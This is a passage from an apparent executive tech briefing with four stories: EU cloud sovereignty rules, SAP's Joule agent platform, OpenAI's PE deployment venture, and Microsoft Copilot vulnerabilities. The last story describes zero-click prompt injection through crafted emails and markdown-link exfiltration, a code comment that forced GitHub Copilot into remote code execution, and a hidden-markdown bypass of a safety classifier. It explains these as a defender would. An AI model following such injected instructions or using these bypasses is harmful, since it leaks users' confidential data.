
Monday, 11 May 2026

01 / 05 · European Sovereignty
8 min read

Brussels Draws a Hard Line Around the Cloud

Ahead of the May 27 Tech Sovereignty Package, the Commission debates locking US hyperscalers out of sensitive public data — and DAX40 hosting plans are next.

·01 Primer

On 27 May 2026 the European Commission plans to publish its Tech Sovereignty Package, a bundle made up of two laws: the Cloud and AI Development Act (CADA) and a revamped Chips Act 2.0. Behind the scenes, officials are debating whether to bar US hyperscalers — Amazon Web Services, Microsoft Azure, Google Cloud — from processing the most sensitive public-sector data, such as health records, judicial files and certain financial information. At the same time, the EU just trimmed parts of its AI Act on 7 May, including halving the grace period for labelling AI-generated content from six to three months. For enterprises, the question is no longer whether sovereign hosting matters, but which workloads must move, and how quickly.

·02 What Happened

In a glass-walled meeting room on the Berlaymont's 13th floor, Executive Vice-President Henna Virkkunen has spent the spring chairing a series of closed sessions on a single, awkward question: how much of Europe's most sensitive data should sit on infrastructure ultimately controlled by US companies. According to people familiar with the discussions, the Commission is weighing categories of public-sector data — healthcare records, judicial files, supervisory data from financial regulators — that could be carved out from US-controlled cloud processing entirely. The framing matters. The Commission is not preparing an outright ban on AWS, Azure or Google Cloud in EU public contracts, but a tiered taxonomy of sovereignty that will, for the first time, codify when a hyperscaler is and is not acceptable. Virkkunen has been blunt about the underlying goal, saying it is important that, as she put it, Europe is the one ‘controlling that in Europe and the data is also localised in Europe.’

The vehicle is the Cloud and AI Development Act, the first half of the Tech Sovereignty Package. The second half is a recast Chips Act 2.0 that would let the Commission invest directly in cross-border fab projects — a striking departure from its earlier role as coordinator and state-aid referee, after the European Court of Auditors warned that the bloc is on track for roughly 12 percent of global chip production by 2030 rather than the original 20 percent target.

The package was meant for March, then April. It is now firmly pencilled in for 27 May, the day after Virkkunen's keynote at EuroDIG 2026. The catch: any data-handling restrictions will eventually need the political nod of all 27 member states, and several capitals — Dublin, The Hague, Stockholm — quietly host significant hyperscaler footprints they would rather not antagonise.

For the DAX40 chief information officers Cowork briefings reach, the Brussels debate is no longer abstract. Procurement teams at German insurers, hospital groups and Landesbanken have spent the past 18 months pushing workloads into AWS European Sovereign Cloud, Microsoft's Bleu/Delos partnership constructs, and Google's Sovereign Controls. Each was sold on the promise of legal isolation from US extraterritorial reach. CADA threatens to redraw that map: a workload that today qualifies as ‘sovereign enough’ under a hyperscaler partner-cloud may, by autumn, fall on the wrong side of a new EU category line. Lobbyists for European cloud providers — OVHcloud, IONOS, Aruba, T-Systems — have spent weeks pressing the Commission to keep US-controlled entities out of the top tier, regardless of where the servers sit.

·03 Timeline & Context

The convergence of dates is unusually compressed. On 7 May, the Council presidency and European Parliament negotiators reached a provisional deal on ‘Omnibus VII’ — the simplification package that streamlines the 2024 AI Act. The hardest obligations on general-purpose AI models are pushed into late 2027, most factory and industrial AI is carved out of scope, and a new ban on AI-generated non-consensual sexual imagery is bolted on. Tucked into the same agreement is the detail that matters most for enterprise content teams: the grace period for providers to implement transparency solutions for AI-generated content drops from six months to three, with the new deadline set at 2 December 2026. The transparency Code of Practice itself — covering watermarking, metadata embedding and deepfake labelling under Article 50 — is being shaped in working group sessions running through May, with a second draft already circulating and finalisation expected by June.

The chronology then steps quickly: 8 May saw the Commission's transparency consultation move into its next stakeholder phase; 26 May, Virkkunen delivers her EuroDIG keynote; 27 May, CADA and Chips Act 2.0 land; through summer, member states begin the slow grind of trilogues.

To make the numbers tangible, consider the comparison. The original 2022 Chips Act mobilised roughly EUR 43 billion in public and private commitments toward doubling Europe's share of global semiconductor production to 20 percent. By the Court of Auditors' arithmetic, Europe will land closer to 12 percent — a shortfall larger, in capacity terms, than the entire output of TSMC's planned Dresden fab. Chips Act 2.0 is the Commission's admission that subsidy coordination alone did not work; the new bill would let Brussels write equity cheques.

The cloud side has its own running history. In January 2026, AWS opened its European Sovereign Cloud out of Brandenburg with a EUR 7.8 billion build-out and appointed Stefan Hoechbauer to run it. Microsoft has accelerated the Bleu joint venture in France and Delos Cloud in Germany. Google has expanded its ‘Sovereign Controls’ line. Not by accident: on 17 April, the Commission awarded its first contracts under the new Cloud Sovereignty Framework — up to EUR 180 million over six years split across four consortia from Luxembourg, Germany, France and Belgium, every one of them European-controlled. CADA is the law that would turn that procurement preference into a horizontal rule.

The political backdrop is a sharp pivot from the simplification camp. In a joint op-ed in Handelsblatt and Corriere della Sera in early May, the CEOs of ASML, Airbus, Ericsson, Mistral AI, Nokia, SAP and Siemens warned that Europe is spending its energy on rule-writing while the US and China scale capacity. Their lobbying achieved the AI Act delay. It has not, so far, dented the sovereignty agenda — which the same governments view as the necessary mirror image of deregulation.

·04 From Brussels to Boardroom

For DAX40 CIOs, the immediate task is taxonomy. The Commission's emerging categories — broadly: sensitive public data, regulated-sector workloads, general enterprise data, and non-sensitive — map only loosely onto the data-classification schemes most large German companies already run. Procurement, legal and architecture teams will need a translation layer.

Three concrete actions are surfacing in CIO conversations Cowork tracks. First, freeze new sensitive-tier migrations into hyperscaler-controlled stacks until the CADA text is on the table. Several DAX40 insurers have already paused phase-two Azure migrations covering claims data; one Landesbank has delayed a planned Google Cloud pilot for supervisory reporting. Second, demand contractual carve-outs from hyperscaler partner-cloud constructs that explicitly anticipate Article-level categorisation under CADA — including exit rights without penalty if a workload is reclassified. Third, audit the AI content pipeline against the new 2 December transparency deadline. Marketing, communications and customer-service functions running generative tools at scale now have three months less than they planned to implement watermarking, provenance metadata and deepfake labels.

The bigger strategic point is that sovereignty is becoming a procurement category rather than a marketing claim. Until now, ‘sovereign cloud’ has been a label hyperscalers and European challengers fought over in slide decks. After 27 May, it will be a regulated tier — with audit consequences. DAX40 boards that treat this as an IT-architecture question will miss the point. It is, increasingly, an industrial-policy question about which infrastructure stack Germany's regulated industries are allowed to run on for the next decade.

Three Perspectives: What this story means for different readers
01

For CIOs at DAX40 insurers, banks and healthcare groups, the immediate cost is optionality. Workloads that have spent two years migrating into AWS European Sovereign Cloud or Microsoft's Bleu/Delos constructs may need re-tiering once CADA's categories crystallise. Expect contract renegotiations with hyperscalers around exit rights, re-classification triggers and data-localisation guarantees. Expect, too, a quiet renaissance for European stack providers — OVHcloud, IONOS, T-Systems, StackIT — in tender shortlists for any workload that touches health, judicial or supervisory data. The AI transparency deadline of 2 December compounds the pressure: communications, marketing and customer-service teams running generative tools must compress a six-month implementation runway into three. Boards should treat sovereignty and AI transparency as one integrated programme, not two parallel compliance tracks.

02

Brussels is threading a needle. Virkkunen's team wants to codify sovereignty without triggering a transatlantic trade fight or breaching WTO procurement rules. The likely landing zone is a tiered taxonomy rather than a blanket ban, with the strictest tier reserved for sensitive public-sector data — healthcare, judicial, financial supervision. Member states with large hyperscaler footprints (Ireland, the Netherlands) will push for narrower definitions; France, Italy and Spain will push for broader ones. The 7 May AI Act simplification deal shows the Commission can move quickly when industry presses hard, but it also reveals the political reflex: streamline rules in one hand, raise the sovereignty wall with the other. Expect trilogues on CADA to stretch into 2027, with the contested terrain being categorisation criteria, not the principle.

03

European cloud and infrastructure founders see a structural tailwind. A statutory tier reserved for EU-controlled providers turns sovereignty into a procurement category, not a marketing slogan — and that changes addressable-market math for the likes of Mistral, Aleph Alpha, Helsing, OVHcloud, Scaleway and a long tail of vertical SaaS plays in regulated industries. The Chips Act 2.0 mechanism to invest directly in cross-border fab and tooling projects opens a fresh equity-funded channel for deep-tech, photonics and advanced-packaging startups. The counter-current is the simplification camp led by ASML, SAP, Mistral and Siemens, which secured the AI Act delay; founders worry the same coalition could lobby CADA's sovereignty categories into something more permissive. Watch the next 90 days: the gap between Commission text and Council compromise is where venture theses get rewritten.

Sources (8 references)
  1. Council of the EU — AI: Council and Parliament agree to simplify and streamline rules (7 May 2026)
  2. European Parliament Legislative Train — Cloud and AI Development Act
  3. CNBC — EU weighs restricting use of U.S. cloud platforms for sensitive government data
  4. European Commission — Code of Practice on marking and labelling of AI-generated content
  5. Bloomberg — EU Chips Act Revamp Would Let Commission Invest Directly in Fabs
  6. Resultsense — ASML, Airbus, Mistral lead CEO call for simpler EU AI rules
  7. AWS Blog — Opening the AWS European Sovereign Cloud
  8. TechPolicy.Press — What the EU AI Omnibus Deal Changes for the AI Act

02 / 05 · Enterprise & Architecture
9 min read

Klein's Orlando Gamble: Joule Becomes SAP's Agent Operating Layer

At Sapphire 2026, SAP bets its boardroom credibility on an A2A protocol that promises openness and risks deeper lock-in.

·01 Primer

SAP's annual Sapphire conference is where the Walldorf group tells its largest customers what to budget for next. This year, the headline is Joule, SAP's in-house AI assistant, which has been rebuilt as an ‘agentic’ layer that can take actions inside finance, HR, procurement and supply chain on a user's behalf. The new SAP AI Foundation bundles models, governance and a marketplace called the AI Agent Hub, where SAP and outside agents are meant to talk to each other through an open Agent-to-Agent (A2A) protocol. For DAX40 boards still wrestling with S/4HANA migrations, the question is simple: is this the credible enterprise answer to Microsoft Copilot and Salesforce Agentforce, or another reason to pay SAP more for the same data?

·02 What Happened

Christian Klein walked onto the Orange County Convention Center stage in Orlando on Monday morning in a navy suit, no tie, and opened with a line he has been rehearsing for a year. ‘ERP is no longer the system of record,’ the SAP chief executive told an audience of roughly 25,000 customers and partners. ‘It is becoming the system of decisions.’ Behind him, a wall-sized animation showed dozens of agent icons connecting through what SAP now calls the AI Agent Hub, the centerpiece of the reimagined Joule experience and the new SAP AI Foundation.

The announcement matters because of what it consolidates. Joule, first introduced in 2023 as a chat sidebar, has been re-engineered into an orchestration layer that now spans 35-plus SAP products, from S/4HANA Cloud and SuccessFactors to Ariba, Concur and the LeanIX portfolio acquired in 2023. SAP put the skill count at more than 2,500, up from roughly 1,200 a year ago, and confirmed more than 30 specialised agents in general availability. Muhammad Alam, the executive board member for product engineering, framed the shift bluntly from the stage: ‘We are moving Joule from a copilot you talk to, to an operating layer that gets work done while you sleep.’

The second pillar is the Agent-to-Agent protocol. SAP aligned its A2A implementation with the open standard originally seeded by Google last year, and is publishing a Joule A2A toolkit on GitHub that lets developers register external agents — LangGraph workflows, OpenAI Assistants, Salesforce Agentforce skills — inside the SAP Agent Hub through the BTP Cloud Foundry runtime. In practice, an Ariba sourcing agent should be able to hand off a contract clause check to a Microsoft 365 Copilot agent running on Anthropic's Claude, then bring the result back into an S/4HANA workflow without a human in the loop.

Not by accident, the choreography around the keynote leaned heavily on partners. Satya Nadella appeared by video to confirm that the first-of-its-kind Joule–Microsoft 365 Copilot integration, in preview through 2025, is now fully production. A pre-recorded segment featured Marc Benioff of Salesforce nodding politely at the A2A standard, even as Agentforce 360 competes head-on for the same agent budget. Walter Sun, who joined SAP last year as global head of AI, used a customer panel to walk through deployments at Mercedes-Benz, Lufthansa Technik and a major DAX-listed chemicals group, where Joule is reportedly orchestrating quote-to-cash and shop-floor exception handling.

More remarkable still was what Klein chose not to lean on: the share price. SAP stock has shed roughly 16 percent year-to-date, weighed down by a Handelsblatt report last month that only 3 percent of customers were using SAP Business AI productively, against a DSAG survey showing 77 percent of AI-active enterprises preferring non-SAP tooling. Sapphire 2026 is the answer to that data point. Whether it is convincing enough is the question every chief information officer in Orlando is now whispering about over coffee.

·03 Architecture

Strip away the staging and SAP's pitch resolves into three architectural moves, each with a non-trivial trade-off.

First, AI Foundation. Until last year, SAP's AI assets were scattered across the Generative AI Hub, Joule Studio, the LeanIX agent catalogue and a handful of model partnerships. AI Foundation collapses them into one BTP-resident control plane with shared identity, observability, prompt management, model routing and a curated catalogue that now includes OpenAI GPT-class models, Anthropic Claude, Google Gemini, Mistral's frontier models via the November 2025 sovereign deal, and SAP's own ABAP-tuned model, SAP-ABAP-1. For a DAX40 CIO, the appeal is governance: one place to enforce data residency, audit logs, and the EU AI Act's Article 50 disclosure requirements across every agent that touches a production SAP table.

Second, Joule Studio and the agent runtime. Joule Studio's Agent Builder went generally available in January and has been extended at Sapphire with a multi-agent orchestrator, retrieval against Business Data Cloud, and a low-code designer aimed at the SAP Build user base. The agents are not just LLM chains — they are tied into SAP's declarative business object model (the Public Cloud ABAP ‘golden path’), so an agent that fires a purchase order is constrained by the same authorisation objects, segregation-of-duty rules and Schemes of Manoeuvre that an SAP GUI user would face. That is genuinely different from a Copilot Studio bot calling a Graph endpoint.

Third, the A2A protocol and Agent Hub. This is where the openness claim will be tested. The protocol itself is a thin specification — agent cards, task lifecycle, asynchronous messaging — and SAP's implementation supports both sides: Joule agents can be discovered by outside hubs, and outside agents can be registered into the SAP Agent Hub through the Agent Gateway. Crucially, however, the trust path runs through SAP. Authentication uses BTP's Identity Authentication Service. Billing and entitlement run through SAP's commerce backbone. The audit trail is SAP's. Federation, in other words, is real at the protocol layer and concentric at the commercial layer.

For anyone who lived through the R/3 era, the design rhymes. In 1992 SAP turned a transactional database into a system of record by making integration cheaper inside the suite than outside; the BAPIs were open, but the gravity stayed in Walldorf. The same physics applies here. An A2A handshake between Joule and Agentforce is technically permitted, but the data lineage, the policy engine and the support escalation all sit on SAP infrastructure. Customers who want a genuinely vendor-neutral agent fabric — say, a Lufthansa or a Siemens running heterogeneous estates — will still need their own orchestration layer above SAP, Microsoft and Salesforce. SAP knows this, which is why LeanIX's enterprise architecture catalogue has been quietly repositioned as that neutral layer.

The economic model is the final tell. SAP confirmed AI units — the consumption metric that began life as a clumsy add-on — will roll forward, but most net-new Joule capacity is now bundled into RISE with SAP and GROW with SAP contracts at the premium tier. Translated: to unlock agent-grade Joule, customers must move to SAP's preferred cloud commercial model. That is open architecture with a toll booth at the on-ramp.

·04 DAX40 Implications

For DAX40 boards, the calculus is no longer whether to deploy enterprise AI but where the orchestration layer lives. The honest answer in 2026 is: in at least three places at once. Microsoft 365 Copilot — now defaulting to Anthropic's Claude for EU and UK tenants since the April 3 admin-centre switch — has become the productivity surface. Salesforce Agentforce 360 owns customer-facing sales and service flows wherever Salesforce is the CRM of record. And Joule, after Orlando, is the only credible contender for the system-of-decisions layer that sits on top of S/4HANA, Ariba and SuccessFactors.

Three practical consequences. One: procurement teams must now negotiate AI-unit consumption alongside RISE migration credits, or risk the same shelfware problem that bedevilled SAP's early HANA story. Two: enterprise architecture functions should treat the A2A protocol as table stakes and ask vendors for written commitments on agent portability, not just interoperability — the difference is whether a customer can lift a Joule skill into another hub without re-implementation. Three: the Mistral and Aleph Alpha tie-ins matter for regulated workloads (defence, public sector, certain pharma), but they do not absolve a DAX40 CIO from a multi-vendor reality. Cohere's announced merger with Aleph Alpha, with Schwarz Group as anchor backer, has just reshuffled the European sovereign stack again. SAP's sovereignty narrative is real, but it is now competing with a transatlantic counterweight, not standing alone.

Three Perspectives: What this story means for different readers
01

For a DAX40 CIO running an S/4HANA programme, the Orlando announcements lower one risk and raise another. They lower the risk of being caught with a generic Copilot deployment that cannot reach into purchase orders, vendor master data or HR personnel actions: Joule, with 2,500 skills and the new Agent Hub, finally closes that gap on the SAP side. They raise the risk of committing to RISE-tier consumption before internal demand is proven. The DSAG number — 3 percent productive usage — is uncomfortable for a reason. Pragmatic boards should pilot A2A federation with one Microsoft and one Salesforce agent in 2026, hold off on enterprise-wide commitments until the agent units billing model is transparent, and insist contracts grant exit rights at the skill level, not just the suite level.

02

The EU AI Act is the silent third actor on the Sapphire stage. High-risk use cases under Annex III — credit scoring, HR decisions, critical infrastructure orchestration — fall squarely within Joule's sweet spot. SAP's positioning of AI Foundation as a governed control plane with audit logs, model cards and EU AI Cloud residency options is partly engineering and partly compliance theatre for procurement committees. BaFin and the German Federal Office for Information Security (BSI) have signalled that they expect agent provenance and human-in-the-loop checkpoints to be demonstrable at audit time, and the A2A protocol's task lifecycle metadata is genuinely useful there. But regulators will scrutinise cross-vendor delegations carefully: a Joule agent handing off a credit decision to an external A2A peer is not a way around Article 50 disclosure or Article 14 oversight requirements. Treat openness as obligation, not optionality.

03

For European founders, Sapphire 2026 is a mixed signal. The good news is that SAP's Mistral partnership, formalised in November 2025, plus the now-bundled Aleph Alpha models, validate the thesis that frontier-class European models can ride on enterprise distribution rails. Mistral AI Studio inside AI Foundation is a meaningful go-to-market for a Paris startup that struggled with direct enterprise sales. The harder news is the addressable market for stand-alone agent startups in core SAP estates just shrank. With 2,500 skills shipping in the box, a vertical agent company selling into procurement, HR or finance must either become a Joule skill (and accept SAP's rev-share), wrap themselves as an A2A peer (and accept SAP's identity and billing layer), or position above the suite as an orchestrator — a niche LeanIX, Celonis and a handful of well-funded American challengers already contest. Capital will flow accordingly.

Sources (9 references)
  1. SAP Sapphire & ASUG Annual Conference Orlando 2026 — SAP Events
  2. SAP Business AI: Release Highlights Q1 2026 — SAP News Center
  3. Joule A2A Agent Toolkit — SAP-samples GitHub
  4. SAP Sapphire 2026 Preview — SAVIC Technologies
  5. Unternehmen fremdeln noch mit SAP Joule — Computerwoche
  6. SAP Joule 2026: Agentic Enterprise AI — Promise vs. Reality — Innobu
  7. SAP and Mistral AI: A New Alliance for European Sovereign AI — SAP News
  8. Microsoft 365 Copilot to Enable Anthropic Models by Default — UC Today
  9. Cohere's deal with Aleph Alpha and the rise of AI middle powers — Fortune

03 / 05 · Markets & FinOps
8 min read

OpenAI's $4B Deployment Company and the PE Pipeline War

OpenAI hands Wall Street a guaranteed 17.5% to embed its engineers inside private-equity portfolios — mirroring Anthropic's Blackstone pact and squeezing the Big Four out of the implementation layer.

·01 Primer

OpenAI has set up a new company that does not sell software — it sells the people who install it. Together with private-equity giants TPG, Brookfield, Advent and Bain Capital, plus fifteen smaller co-investors, it raised about $4 billion at a roughly $10 billion valuation. OpenAI keeps majority control. The new entity, called The Deployment Company, sends OpenAI engineers directly into the offices of companies owned by those PE firms to wire AI into day-to-day operations. To make the deal palatable to backers, OpenAI is reported to have promised them a 17.5% annual return for five years. Anthropic announced an almost identical $1.5 billion venture with Blackstone, Hellman & Friedman and Goldman Sachs the same week. Both moves bypass the implementation work normally done by McKinsey, Accenture and the Big Four.

·02 What Happened

On a Monday in early May, in a windowless room at TPG's San Francisco office, Brad Lightcap walked Jon Winkelried's team through a spreadsheet that looked nothing like a typical software contract. Lightcap, freshly relinquishing the OpenAI chief operating officer role to run what insiders had been calling ‘DeployCo’ for six months, had a single number circled at the top: 17.5%. That, two people briefed on the conversation told reporters, was the floor return OpenAI was prepared to underwrite for its private-equity backers across a five-year hold. Winkelried, who had spent the early winter telling Bloomberg that TPG had stood up an internal AI task force, did not need much persuading.

By the end of that week, OpenAI had locked in $4 billion of fresh capital from nineteen investors, finalised a Delaware-domiciled joint venture valued at roughly $10 billion, and committed an initial $500 million of its own equity — with an option to add another $1 billion later — into a vehicle it will majority-own and Lightcap will run.

The Deployment Company is not another consulting brand. It is an industrial template. OpenAI is hiring dozens of ‘forward-deployed engineers’ — a delivery pattern Palantir spent fifteen years refining — and embedding them inside the operating companies of TPG, Brookfield, Advent, Bain and their co-investors. The engineers do not write decks. They wire ChatGPT, GPT-5 endpoints and the upcoming agent stack into accounts payable at a mid-market healthcare provider, into underwriting at a buyout-owned specialty insurer, into demand forecasting at a logistics roll-up. ‘Our culture is that we try to embody the principles of being both a research and a deployment company,’ Lightcap had told McKinsey in an interview months earlier — a line that now reads like a memo to the consulting industry rather than a philosophy statement.

The pivot is in the second act. Anthropic, four days earlier, had announced a structurally near-identical vehicle with Blackstone, Hellman & Friedman and Goldman Sachs, with Apollo, General Atlantic, Leonard Green, GIC and Sequoia rounding out the table. Total commitment: roughly $1.5 billion. Same forward-deployed model. Same initial target: PE-owned mid-caps in healthcare, manufacturing, financial services, retail and real estate. In the space of a single business week, the two model providers had carved up the private-equity industry between them. And both did it as Anthropic was simultaneously sounding investors on a $50 billion primary round at a $900 billion valuation — a figure that, if it closes, would put Anthropic ahead of OpenAI's own $852 billion March mark and turn the new deployment arms into captive distribution for what are, in effect, the two largest private companies in the world.

·03 The Numbers

Start with the headline structure. OpenAI's joint venture sits at a roughly $10 billion post-money valuation. Investors put in about $4 billion, OpenAI seeded $500 million with an option to add $1 billion, and the rest of the capitalisation comes from the equity OpenAI grants for being the operating partner, the brand, the engineering bench and — uniquely — the underwriter. The 17.5% guaranteed annual return over five years is the line that has caused the most squinting on the buy side. Compounded over the full term, that is an aggregate floor return of roughly 124% on the PE consortium's $4 billion, or about $4.96 billion of contractual upside before any equity gains. By design, this turns a venture-style position into something that underwrites like a credit fund. ‘Private equity vehicles do not typically receive an explicit return commitment from the company they are funding,’ Bloomberg noted dryly. The structure has no real precedent at this scale: the closest comparison is the preferred-equity sleeve that anchored SoftBank's WeWork rescue, but here the underwriter is the operating company itself.

Now scale the addressable revenue. Blackstone alone holds 250-plus portfolio companies generating well over $1 trillion in aggregate revenue. TPG, Brookfield, Advent, Bain and the other OpenAI investors hold thousands more. If The Deployment Company captures even a 1–2% implementation-and-run fee on a serious AI rebuild at the median PE-owned mid-cap — say $5–10 million per engagement — a pipeline of just 400 portfolio companies maps to $2–4 billion of annualised revenue inside three years. That comfortably covers the guaranteed return, leaves OpenAI the majority of the upside, and converts a venture round into something closer to a structured services royalty.

The historical comparison matters. The entire 2024 global consulting M&A pool came in at roughly $3.5 billion, by Mergermarket's count. OpenAI just stood up a single distribution vehicle in one week that is larger than the entire 2024 consulting M&A pool. Anthropic added another $1.5 billion. Set those against the implementation revenue lines that have funded McKinsey, BCG, Accenture, Deloitte, EY, KPMG and PwC for two decades — collectively north of $200 billion a year — and the two ventures are pinholes. But pinholes in the most profitable layer. The Big Four make their margin on staff-augmentation and systems integration, not on slide-ware. Anthropic's annualised revenue is already running toward $45 billion, up from $9 billion at the end of 2025, with more than 1,000 customers each spending over $1 million a year. The model providers are no longer the suppliers. They are the channel.

·04 What This Means for Consulting

The structural problem for the Big Four is not pricing. It is sequencing. A McKinsey engagement at a PE-owned mid-cap typically opens with a six-week diagnostic, runs a quarter of design, then six to nine months of staffed implementation. The Deployment Company sells a different curve: forward-deployed engineers shipping production AI in weeks because they own the model, the tooling and the integration patterns. Three months earlier — in February 2026 — OpenAI had announced a frontier-agent partnership with McKinsey, BCG, Accenture and Capgemini. The DeployCo announcement effectively reroutes the most lucrative tier of that work, the mid-market PE portfolio rollout, away from those partners and into a JV the consultants do not sit inside. Accenture, with its engineering depth, may survive by negotiating a subcontracting layer. McKinsey, anchored in strategy work, has fewer options. Inside the DACH market that this briefing serves, the read for DAX40 advisors is twofold: PE-owned Mittelstand competitors will move faster than their corporate clients, and the consultancies that historically intermediated AI implementation now face a credible alternative that arrives pre-capitalised.

Three Perspectives What this story means for different readers
01

For a DAX40 buyer, the immediate signal is not who installs ChatGPT — it is who their PE-owned competitors just hired. A mid-market manufacturer in Bavaria competing with a Brookfield-owned roll-up is now competing with a company whose accounts payable, scheduling and supplier negotiation may be staffed by OpenAI engineers at preferential commercial terms. Enterprise procurement teams should expect to be pitched the same forward-deployed model within twelve months, but without the PE pricing umbrella. Strategic implication: redraw the build-versus-partner matrix this quarter, because the partner side just got two new entrants who own the model layer and underwrite their own ROI. Procurement leverage shifts toward customers that can credibly threaten to in-house an engineering pod.

02

Brussels and Berlin will look at this twice. A guaranteed-return joint venture between a foundation-model provider and the world's largest financial sponsors raises three flags under the EU AI Act and the upcoming German implementation rules: concentration of high-risk deployments inside a single integrator, downstream model-bias propagation across hundreds of portfolio companies in healthcare and finance, and the question of whether ‘deployment’ inside a PE portfolio constitutes a regulated AI service. BaFin will care about the credit-like character of the 17.5% guarantee. The Bundeskartellamt will care about vertical foreclosure: foundation model, distribution channel and capital provider in one stack. Expect informal inquiries before any formal proceeding.

03

European AI service-layer startups — Mistral's enterprise arm, Aleph Alpha's deployment teams, the wave of forward-deployed boutiques in Berlin and Paris — face a compressed window. The two largest model labs have just demonstrated that the implementation layer is where margin pools, and they have purchased preferential access to thousands of mid-market customers in a single week. Series B founders pitching ‘we put engineers on-site at enterprises’ now compete with vehicles that are pre-capitalised at $10 billion and $1.5 billion respectively. The defensive play is verticalisation: own a regulated sector — defence, public health, BaFin-supervised financial services — that the US labs cannot or will not enter at speed. Generalist deployment startups should accelerate strategic conversations with European PE houses before the spaces close.

Sources 9 references
[1] Bloomberg — OpenAI Finalizes $10B Venture With PE Firms to Deploy AI
[2] The Next Web — OpenAI closes The Deployment Company, a $10bn enterprise AI bet on PE
[3] Technobezz — OpenAI Guarantees 17.5 Percent Annual Return in $10B Enterprise Deal
[4] Blackstone press release — Anthropic Partners with Blackstone, H&F, Goldman Sachs
[5] CNBC — Anthropic teams with Goldman, Blackstone on $1.5B AI venture
[6] TechCrunch — Anthropic could raise $50B at a $900B valuation
[7] Fortune — Anthropic takes shot at consulting industry in JV with Wall Street giants
[8] Fortune — OpenAI partners with McKinsey, BCG, Accenture, Capgemini on Frontier agent platform
[9] McKinsey — Navigating the new frontier with OpenAI's COO Brad Lightcap
04 / 05 · Security & Cyber
9 min read

Microsoft Patches Three Critical Copilot Holes — Prompt Injection Is The New SQL Injection

Microsoft closes three critical information-disclosure flaws in M365 Copilot on May 7 — and turns the agent-identity gap into a boardroom question across DAX40.

·01Primer

Anyone who has put Microsoft 365 Copilot, Copilot Chat or GitHub Copilot into production over the past twelve months has also handed the models access to mail, SharePoint files, Teams chats and source code. Those very connections are now the attack target. On May 7, 2026, Microsoft disclosed three critical vulnerabilities in M365 Copilot and patched them across the cloud — each one lets attackers pull confidential data out of the AI assistant without a click and without privileges. Combined with the August 2025 GitHub Copilot case (CVE-2025-53773, CVSS 9.6, which turns prompt injection into remote code execution), a pattern emerges: prompt injection is the SQL injection of our era. For DAX40 CIOs, BaFin and BSI expectations for AI deployments are no longer abstract — they are operational from now on.

·02What Happened

Estevam Arantes, a security researcher embedded in Microsoft's own red team, had found the first bug weeks before Patch Tuesday inside a controlled tenant: a carefully crafted email to an M365 user was enough to make Copilot exfiltrate internal SharePoint content via a manipulated markdown link on its next Business Chat invocation — without the user opening, clicking, or even seeing the attachment. The second bug, surfaced in parallel by Arantes and an independent researcher using the handle 0xSombra, abused the same mechanism via a second input path. The third hit Copilot Chat inside Edge and could be triggered via command injection. On May 7 the Microsoft Security Response Center published the trio as CVE-2026-26129, CVE-2026-26164 and CVE-2026-33111. The CVSS base score of 7.5 (vector AV:N/AC:L/PR:N/UI:N/C:H/I:N/A:N, which CVSS itself labels only High) understates the exposure: all three are network-accessible, need no privileges and no user interaction, and carry a high confidentiality impact — the exact profile that actuaries at Munich Re have been flagging as critical for months. “The pattern is clear,” Microsoft's CVP for Security Vasu Jakkal wrote in an internal note quoted by the Microsoft Security Blog. “We see indirect prompt injection as a systemic weakness of an entire product class, not as a single bug.” The holes sit inside an escalation arc. In June 2025, Aim Security published EchoLeak (CVE-2025-32711, CVSS 9.3), the first documented zero-click attack on a production LLM application — again M365 Copilot, again via a crafted email, again with data exfiltration from Outlook, SharePoint and Teams. In August 2025 came CVE-2025-53773 in GitHub Copilot and Visual Studio Code: a single comment inside a source file was enough to reconfigure the assistant into “YOLO Mode” and force remote code execution on the developer's machine. 
Wiz Research documented one case in which a compromised npm package installed via prompt injection planted a persistent daemon on roughly 4,000 developer workstations and lifted SSH keys, cloud tokens and credentials. The historical comparison writes itself. What the 2017 release of the ShadowBrokers NSA tools did for Windows network security, this May trio does for AI assistants — the moment when academic proofs of concept become operational risk models. Microsoft has closed the three current holes server-side; admins have nothing to roll out. That is the good news. The bad news: the architectural weakness is unchanged. As long as LLM agents mix data from untrusted inputs with privileged tool calls, more bugs of the same class are coming — in Claude for Enterprise, Joule, Glean and Gemini for Workspace, too.

·03The Numbers

Three data points show the shift in the threat landscape. First, Wiz Research measured a 340 percent year-over-year rise in documented prompt-injection attempts against production enterprise AI systems in Q4 2025. Successful attacks with measurable data exfiltration or unauthorized actions rose 190 percent over the same period. Munich Re explicitly classified prompt injection as a “major attack vector” in its annual Cyber Risk Report, with a specific note on low attacker cost and high scalability. Second, the agent identity gap we covered last week is quantifiable. Saviynt's CISO AI Risk Report 2026 surveyed 235 security leaders; 92 percent say they lack full visibility into AI identities in their environments. 86 percent do not enforce access policies on AI identities. 71 percent confirm AI systems already have access to ERP, CRM and finance platforms — only 16 percent govern that access effectively. Bessemer Venture Partners crystallised the implication in April, and the Cloud Security Alliance confirmed it in a parallel research note: 95 percent of CISOs doubt they could even detect a compromised agent. Only 5 percent feel able to contain the incident. Third, the economic dimension. IBM's Cost of a Data Breach Report 2025 prices breaches in environments without AI access controls at an average of $5.72 million. Shadow-AI incidents — models deployed without security sign-off — cost $4.63 million each. Concentric AI found an average of 802,000 overshared files per organization: files whose permissions are wider than intended, which Copilot will surface for any user those permissions happen to include. Sixteen percent of business-critical data sits outside what permission models are meant to allow. For DAX40 firms, the translation into hard numbers is brutal. An Allianz at 157,000 employees with a full Copilot license (about $30 per user per month plus Agent 365 at $15) runs at roughly $85 million per year — before a single security use case has been validated. Deutsche Bank, Mercedes-Benz and BMW sit in similar ranges. 
In April, Accenture took the global lead by extending its rollout to 200,000 employees. Scale the IBM figures to that population and the expected annual loss on an unsecured Copilot rollout sits in the low double-digit millions — a magnitude at which BaFin and BSI no longer accept excuses.

·04Architecture

The technical diagnosis is straightforward: LLM agents violate a security principle the industry thought it had solved in the early 2000s, the separation of code and data. SQL injection worked because form inputs were concatenated into privileged database statements. Prompt injection follows the same pattern: untrusted content from emails, documents and webpages lands in the same token stream as the system prompt and the tool definitions, and the model has no reliable way to tell instruction from data. Microsoft, Google and Anthropic have trained filter classifiers (Microsoft's XPIA, Anthropic's Constitutional Classifier) meant to spot such manipulation. EchoLeak bypassed XPIA by hiding the malicious instruction in reference markdown, and a classifier is a probabilistic filter on the input, not a boundary; the May holes show that defense stays reactive as long as the architecture stays the same. Three layers do work. First, hard trust boundaries at the data tier: no mixing of user-generated and system-generated content inside one context. Microsoft's Purview implementation and Anthropic's prompt shields point in this direction but remain partial. Second, output validation: every tool call an agent fires, and every link or image it asks the client to render, must run through a policy engine that checks the action against the user's original intent, which is what turns a markdown exfiltration link into a blocked request. Third, agent identity: every agent needs its own identity in Entra, 